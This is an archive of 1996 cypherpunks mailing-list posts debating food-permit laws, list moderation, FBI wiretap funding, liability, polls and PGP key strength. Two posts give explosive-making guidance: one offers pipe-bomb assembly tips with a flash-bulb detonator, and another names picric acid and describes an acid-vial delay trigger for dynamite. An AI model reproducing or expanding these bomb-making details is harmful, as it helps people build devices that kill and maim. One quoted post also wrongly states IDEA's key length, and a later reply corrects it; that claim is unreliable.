> Ombudsman is a Swedish term. I suppose the modern day English
> deconstruction/reconstruction would be ombudsperson.

Indeed, City University of New York has an ombudsperson.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 02:09:57 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: SOUP KITCHENS
In-Reply-To: <Pine.SV4.3.91.960802005945.11780D-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960802071447.3551A-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Alan Horowitz wrote:

> We require people who have syphilis to divulge who their sex
> partners were...
> 
> We require property owners...to install their septic tanks...
> [to] estop them from contaminating the neighbor's well...
> 
> So why should we be terribly upset about an ordinance which
> makes it illegal to operate a residential kitchen...in a city
> park or a city sidewalk?

Alan's analogies(?) are not parallel.  In his syphilis example,
the requirement exists so that sex partners can be warned that
they may have contracted the disease.  A parallel requirement
might be that feeding programs for street people would have to
divulge that the food was prepared in uninspected home kitchens.

In his second case, you are simply dealing with the property
rights of adjacent land owners.  The case for regulation of
septic tanks is that the contamination from absent or improperly
installed tanks does not reveal itself as would, say, burning
toxic waste in the back yard.  

I find it amusing that the law is supposedly so concerned with
food purity for the "homeless."  Hang out near a fast-food place
sometime and watch the street people dumpster dive for the
half-eaten remains of other people's Big Macs.  That is the true
alternative to volunteer feeding programs.  (That, or getting a
job.)

The truth is that local officials are perverting the health codes
to harass these operations, not to "protect the homeless."  At
it's core, it is a hypocritical abuse of power, not unlike the
invocation of the Four Horseman to keep strong crypto out of the
hands of average Americans.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 3 Aug 1996 02:50:09 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Tolerance (fwd)
In-Reply-To: <199608021118.GAA09469@einstein>
Message-ID: <Pine.SUN.3.91.960802074847.3551B-100000@crl3.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 2 Aug 1996, Jim Choate wrote:

> If the person joining the public list is warned that the list
> owner reserves that right [to kick people off] I would agree.
> It would require such a warning to be issued at the time the
> person received their notification of successful joining. If
> that warning is not present and the list is advertised as
> PUBLIC then NO, not even the list operator can ethicaly refuse
> membership to anyone for any reason other than criminal
> activity by a member. Otherwise it isn't public.

Here I have to respectfully disagree, totally, with Jim.  One
does not have to "reserve" one's rights.  They are inherent and
my be exercised pretty much at will (I say "pretty much" because
there are situations where "implied contract" applies).

A restaurant or bookstore is a public place in that it is open
to the public.  Nevertheless, without first "reserving the right"
to do so, the owners may tell you to leave if they don't like 
the way you sound, look or smell.  Criminal activity is not
required legally nor ethically.  Your ejection may, in fact, be
totally arbitrary.  I don't see a privately maintained, "public"
list as being philosophically any different.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike McNally <m5@vail.tivoli.com>
Date: Sat, 3 Aug 1996 00:12:47 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Pipe bombs
In-Reply-To: <ae26cc41120210042fbf@[205.199.118.202]>
Message-ID: <3201FE3A.2274@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:

> 
> Buy a section of metal water pipe ...

And be *real, real careful* when screwing the second cap on the pipe.
Brush any powder off the screw threads on the pipe with a fine-bristled
brush.  Also, watch out for static electricity.  Use a flash bulb as a
detonator.


[ Just doing my part. ]

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * For the time being,
       m5@tivoli.com * m101@io.com          *    
      <URL:http://www.io.com/~m101>         *    three heads and eight arms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Sat, 3 Aug 1996 02:42:54 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <2.2.32.19960802152315.0069de48@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Jim Choate <ravage@EINSTEIN.ssz.com> argued:

>As long as they have a license to operate a food dispencing facility (in
>other words they are certifying they are aware of the correct processes for
>such operations) then nobody should have the right to interfere with their
>operation unless with probable cause (ie proof of danger such as bad weenies
>in their hot dogs). This would not apply to individuals or families making
>such food in the same place for their own and NOT public consumption.

I believe the issue with Food Not Bombs is they didn't get the appropriate
permits, etc, or were denied them, or something.  However, I disagree with
you on this point.  I think they shouldn't be required to obtain a license,
but everyone whom they serve food to should know that they don't have such a
license.  This would equal informed consent.  Also, with Food Not Bombs, many
of the people that the food is being served to is also involved in cooking,
distributing food, and cleaning up.  I've been told it's exactly like a big
picnic, except for anyone is invited to help and/or eat.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sat, 3 Aug 1996 00:00:07 +0800
To: cypherpunks@toad.com
Subject: Dole does Bush-speak [Was:Re: A Libertine Question]
Message-ID: <199608021242.IAA31580@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Vinnie Moscaritolo <vinnie@webstuff.apple.com> wrote:

>I think Bob Dole understands the needs for privacy rights for animals..
>
>the following verbatim account of a segment of a Bob Dole appearance a week
>or so ago at a cotton cooperative in Bakersfield, California

[Verbatim Account elided.]

Is anyone else wondering if Dole's handlers are dosing him with that
"Halcyon" stuff that (partially) caused Bush to be such an easy mark
for David Letterman et al.? We have a *severe* drug problem in this
country...

P.S.
I tell you...one little mishap involving a little bit too much sugar,
and now I'll _never_ get to live it down...:) Those wishing to attend
my "Pennies For Perot" Party at Hooters in Cocowalk, at 6:00PM, on
Saturday, August 3rd please e-mail me.

P.P.S.
Idea: Wiretap citizen-unit Ray for 47 hours and 59 minutes, give him
one minute of non-surveilance (more than he deserves, actually) and
then repeat process, with no pesky judges. Citizen-unit Ray is known
to enjoy firearms, and has said "It's easier to make a bomb than it
is to make a lasagna" in the past. He's also a known cardcarrying
member of the Libertarian Party.
JMR  -- Who privately defends Mr. Sternlight's (or anyone's) right
to cypherpunks list _membership_, while alternately being offended
and amazed by the tone/number of his trolls. Try to imagine if _I_
posted that often...This kind of misunderstanding of Libertarians
is usually caused by a subscription to Time, etc. -- rather than a
careful listening to Libertarians themselves, but believe whatever
you want.

Regards, Jim Ray -- DNRC Minister of Encryption Advocacy
 [The Ministry is An equal opportunistic encryptor.]

"Big business never pays a nickel in taxes, according to Ralph
 Nader, who represents a big consumer organization that never
 pays a nickel in taxes." -- Dave Barry 

 Defeat the Duopoly! Vote "NOTA," not Slick/Dull in November.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray Coming
soon, the "Pennies For Perot" page. Keep billionaires off welfare!
___________________________________________________________________


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMgH2k21lp8bpvW01AQHhnQQAlip0PV1m4Th0fJIlAog0TZOhyPghJ0qd
q0mJ9SFG2XInX8CcgWX18s3ZXJtna6nRRcyqZHZEczffMs0jbA6pdzmqDvZTm3HW
ToIcDgFb7MxV56chzLykGDwF4wdykGQNkLZH6xpk+2+1NjljjYObmsJO30S6XMp3
YQV1C3udlJY=
=MKCK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 3 Aug 1996 00:04:51 +0800
To: cypherpunks@toad.com
Subject: Re: fbi, crypto, and defcon
Message-ID: <9608021250.AA06412@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i, for one, and perhaps others on the list as well, would be interested in hearing
what you mean when you say, "At&t, Microsoft, etc) who are ripping people off on a 
daily basis". 

for example, in what way is AT&T ripping people off? and what about
microsoft? 

i have no use at all for microsoft, and, being a unix person i don't even
use their stuff, but, i wonder how many people use word, excel, powerpoint, etc
that they ripped-off from someone else, without paying microsoft what they are
due for having developed the products. 

in general, i suspect that the rip-off is going the other way. after all, 
no one forces anyone buy from microsoft, AT&T, etc., but people do steal from
them, whenever they have the opportunity. not everyone, of course, but certainly
some do.  

these companies provide products and/or services that you are free to 
purchase or not, as you see fit or can afford.

	-paul

> From cypherpunks-errors@toad.com Thu Aug  1 18:31:50 1996
> X-Sender: ceridwyn@gonzo.wolfenet.com
> X-Mailer: Windows Eudora Pro Version 2.2 (32)
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Wed, 31 Jul 1996 22:13:56 -0700
> To: cypherpunks@toad.com
> From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
> Subject: Re: fbi, crypto, and defcon
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1579
> 
> 
> >> Okay, so their boss is part of the law making process, subject to the checks
> >> and balances that exist between the three branches of US government. They
> >> are in a position to supply their boss with data and I am personally
> >> impressed with their grasp of some of that data (it sounds to me like they
> >> are telling their boss that hackers like the ones at Defcon are not the
> >> problem).
> 
> It was interesting how the Agent made the point that the FBI was there to 
> enforce laws, not make policy.  Then his Boss's role in the law making process
> was brought up, the Agent said "but any of you can do the same thing, you
> all have a voice" etc etc.  Then he refused to answer political questions 
> based on the fact that he was there as a representative of the FBI, failing
> to see that his Boss is also a representative of the FBI when recommending
> legislation.  (Again, I realize he was "under orders" not to discuss it, I 
> wish he wouldn't try to justify it with obviously faulty logic.)
> 
> >    I think what they are really saying is that they would love to
> >bust most hackers, but since they can't they might as well use some of
> >them to catch the bigger fish.  If they truly did believe in the laws they
> >are supposed to uphold they wouldn't associate with hackers (who commit
> >computer crimes) at all.
> 
> A more cynical view is that they are there to protect some of the biggest
> institutions of "organized crime" (ie: Congress, At&t, Microsoft, etc) who
> are ripping people off on a daily basis from the other organizations who
> refuse to play by their rules.
> 
> //cerridwyn//
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brock N. Meeks" <brock@well.com>
Date: Sat, 3 Aug 1996 03:07:07 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: Freeh slimes again: Digital Telephony costs $2 billion now ...
In-Reply-To: <199608012258.PAA29066@ohio.chromatic.com>
Message-ID: <Pine.3.89.9608020836.A15150-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 1 Aug 1996, Ernest Hua wrote:

> Louis Freeh is now asking the Congress for $2 billion to fund
> Digital Telephony.  Yes, that is FOUR TIMES what he said it
> would cost the taxpayers to give up their own privacy.  Score
> one for the cynics who said $500 million was not enough.

I broke the story about how much Digital Telephony would *really* cost in 
CyberWire Dispatch more than two years ago.  The price tag in my piece:  
"... at least $2 billion..."  In that Dispatch I wrote that the Clinton 
White House had made the decision to support the bill based on a flawed 
cost/benefit analysis study the FBI had done.

--Brock




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 3 Aug 1996 03:25:21 +0800
To: cypherpunks@toad.com
Subject: Re: Blurring the Chains of Causation
Message-ID: <9608021314.AA06420@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


in my view the ultimate foolishness of this sort was bringing Cessna Aircraft
to it's knees by sueing them on behalf of people who crashed because of
their inability to handle the airplane in the conditions into which
they put themselves.

	-paul

> From cypherpunks-errors@toad.com Thu Aug  1 18:32:44 1996
> Date: Thu, 1 Aug 1996 10:39:12 -0700
> X-Sender: tcmay@mail.got.net
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> To: cypherpunks@toad.com
> From: tcmay@got.net (Timothy C. May)
> Subject: Blurring the Chains of Causation
> Sender: owner-cypherpunks@toad.com
> Content-Length: 4559
> 
> 
> An unusual thread name, "Blurring the Chains of Causation."
> 
> What I mean is this:
> 
> - the U.S. legal system has been blurring, or confusing, the chain of
> cause-and-effect in crimes
> 
> - Example: allowing suits by insurance companies and states against tobacco
> companies. A smoker gets cancer by his actions, and it used to be that this
> was his action, his responsibility. Now, we hold tobacco companies liable,
> and perhaps will someday hold executives of these companies criminally
> liable. (This for a product which is not illegal, mind you.)
> 
> (There are a bunch of related examples. "Civil liability" is a major way
> this blurring is happening. Gun manufacturers being sued for crimes
> committed with their guns, ladder makers sued by the families of criminals
> who leaned ladders up against electrified fences, and so on. How long
> before a bookstore is sued for "allowing" a book to be bought by someone
> who later is "inspired" to commit a crime--actually, John Grisham ("The
> Firm") is involved in a lawsuit against Oliver Stone for his film, "Natural
> Born Killers," which Grisham claims "inspired" a murder. This has got to
> stop, in my opinion.)
> 
> - "They made me do it" defenses. Hostess Twinkies are implicated in the
> brutal murder of San Francisco's mayor and a city councilman. Childhood
> abuse is exculpatory in other cases. Psychobabblers blather about what
> caused people to behave as they did. A mass murderer says pornography made
> him kill 25 women. A lawyer claims his client's son committed suicide after
> listening to heavy metal music. And so it goes.
> 
> This blurring has links to cryptography, bomb-making instructions on the
> Net, availability of porn on the Net, and many other things.
> 
> To cut to the chase:
> 
> - a librarian who "allows" a person to check out "The Anarchist Cookbook"
> is *not* causing a crime, though much of the rhetoric one hears is
> otherwise.
> 
> - the _author_ of that book (Powell, allegedly) is *also* not causing a crime.
> 
> - the _publishers_ of that book (Lyle Stuart, as I recall--my copy is not
> handy) also have not committed any crime
> 
> To make things clear, some of the language being proposed in the
> rush-to-law about anti-terrorism, wiretapping, anti-encryption, etc. As
> Sen. Feinstein puts it, "We hope we can wrap up the repeal of the Bill of
> Rights and have it on President Clinton's desk before the close of the
> Olympics on Sunday." :-(
> 
> - if I _advocate_ strong crytography, avoidance of taxes, undermining of
> government power, crypto anarchy, etc., I have not committed any crime
> (Caveat: advocating the violent overthrow of the U.S. government apparently
> is a crime, as are certain forms of conspiracy, a la RICO, tax evasion,
> etc.)
> 
> - if I _use_ strong cryptography, I have not committed any crime, ipso
> facto, nor am I necessarily conspiring to commit any crime
> 
> And so on.
> 
> Many of the proposed restrictions seek to further blur this chain of
> causation, by making someone who provides access to materials which _may_
> later be used in a crime, or which may "inspire" someone to crime, a kind
> of criminal.
> 
> The trend picked up steam with the "deep pockets" precedents in the 70s
> (*), was fed by the blame-passing psychobabble of the same decade, and has
> now reached its present state by a willingness of the courts to hear such
> cases.
> 
> People who actually commit real crimes are the criminals, not those who
> sold them Hostess Twinkies without first checking their blood sugar level.
> Not those who let a library patron look at a "dangerous" book. And not
> those who provided strong cryptographic tools which _might_ be used by
> terrorists, pedophiles, and money launderers.
> 
> --Tim May
> 
> (* "deep pockets" -- If there are N parties in a lawsuit, and one of them
> shares only 5% of the (putative) blame but has 95% of the overall assets,
> go after the party with the "deepest pockets." This forced Cessna and
> Piper, the leading light aircraft firms at one time, to stop selling light
> aircraft. The example with Oliver Stone being sued is a clear case of
> this.)
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Licensed Ontologist         | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Conrad Walton <conrad@walton.com>
Date: Sat, 3 Aug 1996 04:43:04 +0800
To: <cypherpunks@toad.com>
Subject: Re: Bombs & bomb threats in LA
Message-ID: <1373144101-347077@industrial-artworks.com>
MIME-Version: 1.0
Content-Type: text/plain


>
>and everyplace else all the news.answers FAQs are stored. What, precisely, is
>an acid bomb? Also note the standard blame-the-Internet (not, say, increased
>irritation with government after the Republicans failed to reduce it) 
>rhetoric.

i'm not exactly sure what an acid bomb is, but according to my book, The 
Anarchist Cookbook, that I bought in 1972 (was the internet around back 
then?), there is a compound called "picric acid" that is "more powerful 
than TNT, but has some disadvantages". 

if you'd like the recipe, I'll be more than happy to mail you it through 
the US Postal system. Wouldn't want to give the Internet any more of a 
bad name for distributing subversive materials.

There is also instructions on using an inverted vial of sulpheric acid, 
that will then eat thu the stopper at the top (bottom) of the vial. when 
the acid makes it thru, then is mixes with Potassium Chloride and causes 
a small explosion which sets off the larger explosion in the dynomite 
packed around it. 

just thot you'd like to know.



thanks,
conrad



__________I_N_D_U_S_T_R_I_A_L___A_R_T_W_O_R_K_S__________
Conrad Walton         http://www.industrial-artworks.com/
POB 2815, El Segundo, CA 90245             1-310-640-3365
---------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com (Paul J. Bell)
Date: Sat, 3 Aug 1996 03:37:42 +0800
To: cypherpunks@toad.com
Subject: Re: Is 1024-bit PGP key enough?
Message-ID: <9608021339.AA06431@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


actually, the IDEA key is 128 bits.
	-paul

> From cypherpunks-errors@toad.com Fri Aug  2 03:06:24 1996
> X-Sender: gcg@mail.pb.net
> X-Mailer: Windows Eudora Pro Version 2.2 (32)
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Thu, 01 Aug 1996 22:16:06 -0400
> To: jim@ACM.ORG
> From: "Geoffrey C. Grabow" <gcg@pb.net>
> Subject: Re: Is 1024-bit PGP key enough? 
> Cc: cypherpunks@toad.com
> Sender: owner-cypherpunks@toad.com
> Content-Length: 1454
> 
> At 15:38 08/01/96 PDT, Jim Gillogly wrote:
> >
> >Somebody says:
> >>> Is security provided by 1024-bit PGP key sufficient against most powerful
> >>> computers that are available today? Say if smoe organization spent 10
> >>> billions of dollars on a cracking machine, would it be possible to crack 
> >>> the keys in reasonable time?
> >
> >Derek Atkins <warlord@MIT.EDU> responds with some useful and authoritative
> >information -- thanks.
> >
> Also, remember that although the PGP key is 1024 bits, it generates a much
> smaller IDEA key with 56 bits (I think... anyone?).  The 56 bit key is
> vunerable to that $1 mil mystery machine that the NSA may or may not have.
>  
>                                                      G.C.G.
> 
>  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>  | Geoffrey C. Grabow       |      Great people talk about ideas.       |
>  | Oyster Bay, New York     |     Average people talk about things.     |
>  | gcg@pb.net               |      Small people talk about people.      |
>  |----------------------------------------------------------------------|
>  |     PGP 2.6.2 public key available at http://www.pb.net/~wizard      | 
>  |          and on a plethora of key servers around the world.          |
>  |----------------------------------------------------------------------|
>  | That which does not kill us, makes us stranger.   - Trevor Goodchild |
>  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: artichoke bill <artichoke@null.dev.com>
Date: Sat, 3 Aug 1996 03:16:23 +0800
To: cypherpunks@toad.com
Subject: privacy is a SMOKESCREEN.
Message-ID: <3202307A.1DF3@null.dev.com>
MIME-Version: 1.0
Content-Type: text/plain


from eff:
----------------------------------------------------------------------


Subject: ALERT: Congress Rushing to Enact Anti-Privacy Bill - Call 
Congress NOW!
--------------------------------------------------------------------------------

 **** Last minute update ****

Just before ye editor was about to send this issue out, reports are
filtering in that negotiations on the bill that is the subject of the
alert below, have collapsed.

CNN reports: "Key members of the Senate blamed House conservatives for 
the
failure, saying they had insisted on linking proposed new
wiretapping authority for the FBI to an expansion of privacy laws."

CNN quotes Rep. Charles Schumer (D-NY) as saying that House Republican
leaders "have come up with this smokescreen called privacy".  You may
wish to let Rep. Schumer know how you feel about your right to privacy
being labelled "a smokescreen":

     9th Dist. NY   Schumer, Charles E. (D)
     1-202-225-6616 (voice), 1-202-225-4183 (fax)

The full text of the CNN article is available at:
http://www.cnn.com/US/9608/01/wh.terror.bill/index.html

The article also reports that "lawmakers said there is hope for
agreement after the month long" Congressional recess beginning at the 
end
of this week.

THIS MEANS THAT THE ALERT BELOW IS STILL URGENT, and still important.
We just have a short breathing space now.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 3 Aug 1996 00:57:25 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Jim Bell, stay out of Georgia....
Message-ID: <2.2.32.19960802135437.0086dfc4@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:35 PM 8/1/96 EDT, E. ALLEN SMITH wrote:

>>Anarchist charged with advocating government overthrow
>
>>   JONESBORO, Ga. -- An 18-year-old self-styled anarchist who allegedly
>>   distributed a free, homemade pamphlet with anti-government rhetoric
>>   has been charged with advocating the overthrow of the U.S. government.


Boy some people have all the luck.  It is really rough to get the
authorities to arrest you in circumstances where you can make them look
absolutely ridiculous.  They usually refuse to play.  I suppose they busted
this guy because they thought they could in the current atmosphere and they
figured he's a schlubb who wouldn't give them any grief.

It would not be a pleasant experience for the geheime staats polizei to try
an arrest like this of someone who was capable of mounting a verbal and
legal defense.

"We Shall Overcome," "You copraphageous cretins," "Haven't you
<anglo-saxonism> idiots read Cohen vs. California,"  "I think if you mental
defectives read the Supremes in the Smith Act cases you'd find that I can
advocate blowing you <anglo-saxonism> up all I like as long as I am not part
of an immediate conspiracy to do so."  Do you *like* carrying 300-pound
people around?  Why should I assist in my own oppression by walking?  You
Nazis are always trying to get the Jews to *walk* into the gas chambers."
"You know you're going to have to let me loose sooner or later so why not
make it sooner.  It will be easier on everyone."  "You know the DA is going
to dismiss.  This dog don't hunt.  Won't you look like right fools."  "It's
going to be super fun to have you on the witness stand in the false arrest
suit.  It's going to be great to get the chance to cross-x you in public."
"Boy, finally a chance to build up some prison time for my memoirs."
"Great, I've really needed some quality time to catch up on my reading.
I've still got 13 Aubrey/Maturin novels to finish."

Repeat endlessly in a loud voice. 

Brian -- why do the cops do busts like this where they know they will be
thrown out?

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sat, 3 Aug 1996 05:00:23 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: FPGAs and Heat (Re: Paranoid Musings)
In-Reply-To: <199608021711.MAA01770@homeport.org>
Message-ID: <199608021708.KAA21925@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:

> | That's one of the things that killed Thinking Machines.  It turned out
> [...]
> | At the time Thinking Machines went under, Seymour Cray had a big contract
> 
> 	Just a nit, but Thinking Machines is still in business, and has
> had their first few profitable quarters. www.think.com

The current Thinking Machines is a software firm, and Daniel Hillis is no
longer amongst the top management.  The name lives on, but the business
of designing, building, and selling exotic supercomputers is kaput.

Not an uncommon story in the computer business.  Even Control Data 
Corporation still exists in a transmogrified form, although their
mainframe business went up in smoke ages ago. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 3 Aug 1996 05:07:05 +0800
To: cypherpunks@toad.com
Subject: Licensing, Permits, and Freedom
Message-ID: <ae27837a000210043380@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:23 PM 8/2/96, Cerridwyn Llewyellyn wrote:
>Jim Choate <ravage@EINSTEIN.ssz.com> argued:
>
>>As long as they have a license to operate a food dispencing facility (in
>>other words they are certifying they are aware of the correct processes for
>>such operations) then nobody should have the right to interfere with their
>>operation unless with probable cause (ie proof of danger such as bad weenies
>>in their hot dogs). This would not apply to individuals or families making
>>such food in the same place for their own and NOT public consumption.
>
>I believe the issue with Food Not Bombs is they didn't get the appropriate
>permits, etc, or were denied them, or something.  However, I disagree with
>you on this point.  I think they shouldn't be required to obtain a license,
>but everyone whom they serve food to should know that they don't have such a
>license.  This would equal informed consent.  Also, with Food Not Bombs, many
>of the people that the food is being served to is also involved in cooking,
>distributing food, and cleaning up.  I've been told it's exactly like a big
>picnic, except for anyone is invited to help and/or eat.

It was in fact "Food Not Bombs" which I was referring to in my post a few
days ago.

My point to the City Council was one of inconsistency (picnic groups not
similarly hassled). Also, the use of "permits" to harass/muzzle a group.

"Permits" are often used to stop speech and acts which are not considered
acceptable. Drawing on my own community for an example, Santa Cruz tried to
regulate palm readers, astrologers, mystics, and seers. This eventually
fell apart, possibly when the implications became clear to the bureaucrats
(the future was already clear to the Cassandras, but nobody believed them).

My "Licensed Ontologist" line in my .sig was added during one of the
debates about the claimed need to license and regulate persons in various
professions.

(There are of course the usual other examples, where job unions and cartels
stop "outsiders" from participating. Often for ostensibly good reasons, but
"guilds" nonetheless. The implications of crypto anarchy for these guilds
are left as exercises for the student.)


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 3 Aug 1996 01:41:43 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: More evidence that democracy is bunk
Message-ID: <199608021417.KAA27112@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Aug 96 at 15:34, E. ALLEN SMITH wrote:

> 	And some people think democracies secure civil liberties...
> 	-Allen

And some people think polls are an accurate representation of 
anything.  Chances are it's really a poll of people with telephones 
who just finished watching news reports about increased threats of 
terrorism.  Depends on the exact questions that were asked of them, 
too...

[..]
> >   As an antidote, 80 percent believe the federal government should have
> >   more power to investigate terrorists, but just 52 percent believe
> >   wiretaps should be expanded.

Note that 'more power to investigate terrorists' is vague.  Very 
vague, especially if the actual question was "should the federal 
government be given a greater ability to investigate terrorists?" 
(which is not the same as 'more power'... greater ability could be 
more funds or manpower, for instance.)

Often time pollsters will introduce the question with a short 
paragraph or statistics explaining the situation... often these will 
cue someone in to be more likely to answer a certain way.  If the 
pollster says "with the increase in terrorist activisties in the 
United States and new communications technologies, should the federal 
government..." a respondant will be more likely to agree that the 
gov't should have more power.

> >   Three out of five said they still favor giving the government more
> >   power even if that meant groups unrelated to terrorism were
> >   investigated, too.

That's vague too. What was the question: "...even if it meant a 
charity that was exploited by a terrorist group was investigated" or 
a "political group which a suspected terrorist belonged too" etc.?

> >   Even if it cost more, nearly nine out of 10 people surveyed want
> >   more security checkpoints, guards and metal detectors -- and
> >   they'd be willing to wait longer in lines -- at public events.

If they were asked if they minded random searches of their bags and 
belongings or required to carry photo-ID wherever they went, to be 
presented on demand, would they still be willing?

Rob

 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sat, 3 Aug 1996 01:41:51 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Keeping America safe from Soy Milk
Message-ID: <199608021417.KAA27115@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  1 Aug 96 at 14:35, E. ALLEN SMITH forwarded:

> >   JONESBORO, Ga. -- An 18-year-old self-styled anarchist who allegedly
> >   distributed a free, homemade pamphlet with anti-government rhetoric
> >   has been charged with advocating the overthrow of the U.S. government.
> [...]
> >   The pamphlet was laced with with anti-police cartoons, obscenities,
> >   and anarchist slogans. The one overt reference to violence was an
> >   illustration of a "Molotov cocktail" on the same sheet with a recipe
> >   for "soy milk" made from water-soaked soybeans, sugar and vanilla and
> >   strained through a T-shirt.

Nuff said.

Rob
 
---
No-frills sig. Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sat, 3 Aug 1996 01:41:46 +0800
